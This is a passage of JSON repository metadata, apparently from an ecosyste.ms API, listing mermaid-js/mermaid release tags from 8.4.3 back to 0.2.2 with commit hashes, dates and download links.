at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codelo